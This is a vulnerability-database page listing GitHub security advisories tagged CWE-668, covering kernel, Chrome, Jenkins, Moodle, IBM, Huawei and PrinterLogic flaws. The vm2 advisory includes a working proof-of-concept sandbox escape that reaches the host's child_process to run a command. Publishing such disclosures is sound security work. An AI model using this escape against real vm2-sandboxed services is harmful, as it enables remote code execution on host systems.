Common Weakness Enumeration

CWE-668

Discouraged

Exposure of Resource to Wrong Sphere

Abstraction: Class · Status: Draft

The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

1251 vulnerabilities reference this CWE, most recent first.

GHSA-9RXX-PQ63-85W7

Vulnerability from github – Published: 2025-08-16 12:30 – Updated: 2026-01-22 18:50
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

drm/imagination: Fix kernel crash when hard resetting the GPU

The GPU hard reset sequence calls pm_runtime_force_suspend() and pm_runtime_force_resume(), which according to their documentation should only be used during system-wide PM transitions to sleep states.

The main issue though is that depending on some internal runtime PM state as seen by pm_runtime_force_suspend() (whether the usage count is <= 1), pm_runtime_force_resume() might not resume the device unless needed. If that happens, the runtime PM resume callback pvr_power_device_resume() is not called, the GPU clocks are not re-enabled, and the kernel crashes on the next attempt to access GPU registers as part of the power-on sequence.

Replace calls to pm_runtime_force_suspend() and pm_runtime_force_resume() with direct calls to the driver's runtime PM callbacks, pvr_power_device_suspend() and pvr_power_device_resume(), to ensure clocks are re-enabled and avoid the kernel crash.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-38521"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-16T11:15:45Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
  "id": "GHSA-9rxx-pq63-85w7",
  "modified": "2026-01-22T18:50:53Z",
  "published": "2025-08-16T12:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38521"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/9f852d301f642223c4798f3c13ba15e91165d078"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d38376b3ee48d073c64e75e150510d7e6b4b04f7"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/e066cc6e0f094ca2120f1928d126d56f686cd73e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9V7R-QG2V-5VFC

Vulnerability from github – Published: 2024-06-13 15:30 – Updated: 2024-06-13 15:30
VLAI
Details

IBM Maximo Asset Management 7.6.1.3 and IBM Maximo Application Suite 8.10 and 8.11 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 279973.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-22333"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-525",
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-13T14:15:11Z",
    "severity": "MODERATE"
  },
  "details": "IBM Maximo Asset Management 7.6.1.3 and IBM Maximo Application Suite 8.10 and 8.11 allows web pages to be stored locally which can be read by another user on the system.  IBM X-Force ID:  279973.",
  "id": "GHSA-9v7r-qg2v-5vfc",
  "modified": "2024-06-13T15:30:36Z",
  "published": "2024-06-13T15:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22333"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279973"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7157256"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7157257"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9VG3-4RFJ-WGCM

Vulnerability from github – Published: 2026-05-08 16:20 – Updated: 2026-05-14 20:37
VLAI
Summary
vm2 has Sandbox Breakout Through Null Proto Exception
Details

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.

PoC

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
    throw o;
} catch (e) {
    e.f = Buffer.prototype.inspect
    o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44009"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T16:20:58Z",
    "nvd_published_at": "2026-05-13T18:16:17Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nIn `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst o = {__proto__: null};\ntry {\n\tthrow o;\n} catch (e) {\n\te.f = Buffer.prototype.inspect\n\to.f.constructor(\"return process\")().mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n}\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.",
  "id": "GHSA-9vg3-4rfj-wgcm",
  "modified": "2026-05-14T20:37:12Z",
  "published": "2026-05-08T16:20:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44009"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 has Sandbox Breakout Through Null Proto Exception"
}

GHSA-9VMX-V4H8-HFV8

Vulnerability from github – Published: 2022-07-27 00:00 – Updated: 2022-07-29 00:00
VLAI
Details

Inappropriate implementation in iframe in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to leak cross-origin data via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1501"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-26T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Inappropriate implementation in iframe in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to leak cross-origin data via a crafted HTML page.",
  "id": "GHSA-9vmx-v4h8-hfv8",
  "modified": "2022-07-29T00:00:19Z",
  "published": "2022-07-27T00:00:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1501"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_26.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/1293191"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-25"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9W5W-XQMF-4QCW

Vulnerability from github – Published: 2024-08-21 03:31 – Updated: 2025-09-26 21:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

wifi: ath12k: change DMA direction while mapping reinjected packets

For fragmented packets, ath12k reassembles each fragment as a normal packet and then reinjects it into HW ring. In this case, the DMA direction should be DMA_TO_DEVICE, not DMA_FROM_DEVICE. Otherwise, an invalid payload may be reinjected into the HW and subsequently delivered to the host.

Given that arbitrary memory can be allocated to the skb buffer, knowledge about the data contained in the reinjected buffer is lacking. Consequently, there’s a risk of private information being leaked.

Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.1.1-00209-QCAHKSWPL_SILICONZ-1

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43881"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-21T01:15:12Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: change DMA direction while mapping reinjected packets\n\nFor fragmented packets, ath12k reassembles each fragment as a normal\npacket and then reinjects it into HW ring. In this case, the DMA\ndirection should be DMA_TO_DEVICE, not DMA_FROM_DEVICE. Otherwise,\nan invalid payload may be reinjected into the HW and\nsubsequently delivered to the host.\n\nGiven that arbitrary memory can be allocated to the skb buffer,\nknowledge about the data contained in the reinjected buffer is lacking.\nConsequently, there\u2019s a risk of private information being leaked.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.1.1-00209-QCAHKSWPL_SILICONZ-1",
  "id": "GHSA-9w5w-xqmf-4qcw",
  "modified": "2025-09-26T21:30:26Z",
  "published": "2024-08-21T03:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43881"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/33322e3ef07409278a18c6919c448e369d66a18e"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/6925320fcd40d8042d32bf4ede8248e7a5315c3b"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/e99d9b16ff153de9540073239d24adc3b0a3a997"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9WVM-C92G-HVQG

Vulnerability from github – Published: 2022-02-09 00:00 – Updated: 2026-07-05 03:30
VLAI
Details

PrinterLogic Web Stack versions 19.1.1.13 SP9 and below are vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability that allows an unauthenticated attacker to reassign drivers for any printer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42640"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-02T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "PrinterLogic Web Stack versions 19.1.1.13 SP9 and below are vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability that allows an unauthenticated attacker to reassign drivers for any printer.",
  "id": "GHSA-9wvm-c92g-hvqg",
  "modified": "2026-07-05T03:30:44Z",
  "published": "2022-02-09T00:00:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42640"
    },
    {
      "type": "WEB",
      "url": "https://portswigger.net/daily-swig/printerlogic-vendor-addresses-triple-rce-threat-against-all-connected-endpoints"
    },
    {
      "type": "WEB",
      "url": "https://securityaffairs.co/wordpress/127194/security/printerlogic-printer-management-suite-flaws.html"
    },
    {
      "type": "WEB",
      "url": "https://thecyberthrone.in/2022/01/26/printerlogic-%F0%9F%96%A8-fixes-critical-vulnerabilities-in-its-suite/?utm_source=rss\u0026utm_medium=rss\u0026utm_campaign=printerlogic-%25f0%259f%2596%25a8-fixes-critical-vulnerabilities-in-its-suite"
    },
    {
      "type": "WEB",
      "url": "https://www.printerlogic.com/security-bulletin"
    },
    {
      "type": "WEB",
      "url": "https://www.securityweek.com/printerlogic-patches-code-execution-flaws-printer-management-suite"
    },
    {
      "type": "WEB",
      "url": "https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert"
    },
    {
      "type": "WEB",
      "url": "http://printerlogic.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9WXH-JJJ5-67CV

Vulnerability from github – Published: 2022-01-13 00:00 – Updated: 2023-05-24 17:47
VLAI
Summary
Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs
Details

Jenkins SSH Agent Plugin prior to 1.23.2 and 1.22.1 does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 and 1.22.1 requires the appropriate permissions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:ssh-agent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.23"
            },
            {
              "fixed": "1.23.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:ssh-agent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.22.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-20620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-27T21:24:04Z",
    "nvd_published_at": "2022-01-12T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins SSH Agent Plugin prior to 1.23.2 and 1.22.1 does not perform permission checks in several HTTP endpoints.\n\nThis allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.\n\nAn enumeration of credentials IDs in SSH Agent Plugin 1.23.2 and 1.22.1 requires the appropriate permissions.",
  "id": "GHSA-9wxh-jjj5-67cv",
  "modified": "2023-05-24T17:47:11Z",
  "published": "2022-01-13T00:00:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20620"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/ssh-agent-plugin/commit/04f526d2f73a6fc24b59df20ba03d95265114835"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/ssh-agent-plugin/commit/9c08b9f93cfb3ada0f0124f5bd7f0d027728a750"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20620.jsonhttps://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20620.json"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/ssh-agent-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2189"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/01/12/6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs"
}

GHSA-9X63-M3CC-QF3G

Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2024-04-23 22:51
VLAI
Summary
Moodle Unauthorized searching of arbitrary blogs by typing full url
Details

In Moodle 2.x and 3.x, searching of arbitrary blogs is possible because a capability check is missing.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "moodle/moodle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2"
            },
            {
              "fixed": "3.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "moodle/moodle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1"
            },
            {
              "fixed": "3.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "moodle/moodle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0"
            },
            {
              "fixed": "3.0.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "moodle/moodle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7"
            },
            {
              "fixed": "2.7.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-7490"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-23T22:51:17Z",
    "nvd_published_at": "2017-05-15T14:29:00Z",
    "severity": "MODERATE"
  },
  "details": "In Moodle 2.x and 3.x, searching of arbitrary blogs is possible because a capability check is missing.",
  "id": "GHSA-9x63-m3cc-qf3g",
  "modified": "2024-04-23T22:51:17Z",
  "published": "2022-05-13T01:47:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7490"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/moodle/moodle"
    },
    {
      "type": "WEB",
      "url": "https://moodle.org/mod/forum/discuss.php?d=352354"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Moodle Unauthorized searching of arbitrary blogs by typing full url"
}

GHSA-9XF3-QH47-FRWV

Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-07-13 00:01
VLAI
Details

There is an Unauthorized file access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-22488"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-28T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "There is an Unauthorized file access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.",
  "id": "GHSA-9xf3-qh47-frwv",
  "modified": "2022-07-13T00:01:09Z",
  "published": "2022-05-24T19:19:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22488"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2021/7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C227-Q7J7-XF88

Vulnerability from github – Published: 2024-05-21 15:31 – Updated: 2025-09-19 15:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ipack: ipoctal: fix stack information leak

The tty driver name is used also after registering the driver and must specifically not be allocated on the stack to avoid leaking information to user space (or triggering an oops).

Drivers should not try to encode topology information in the tty device name but this one snuck in through staging without anyone noticing and another driver has since copied this malpractice.

Fixing the ABI is a separate issue, but this at least plugs the security hole.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-47401"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-21T15:15:25Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipack: ipoctal: fix stack information leak\n\nThe tty driver name is used also after registering the driver and must\nspecifically not be allocated on the stack to avoid leaking information\nto user space (or triggering an oops).\n\nDrivers should not try to encode topology information in the tty device\nname but this one snuck in through staging without anyone noticing and\nanother driver has since copied this malpractice.\n\nFixing the ABI is a separate issue, but this at least plugs the security\nhole.",
  "id": "GHSA-c227-q7j7-xf88",
  "modified": "2025-09-19T15:31:07Z",
  "published": "2024-05-21T15:31:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47401"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/0a9c36a2e06a249acbed64e8e0b84637c2ad7575"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2725925982dc96a78069cd118ea3d66759bfdad7"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/5f6a309a699675680df15d9b6d389114515b4426"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/741ea2670e021350e54f491106bdaa22dc50e6a0"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/829f13d6079cf7a2465522f39acb43033e9b320d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8657158a3b68c85234e6da3d8eae33d6183588b7"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/a89936cce87d60766a75732a9e7e25c51164f47c"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/acb96e782bad427ca4bb1bd94af660acd1462380"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.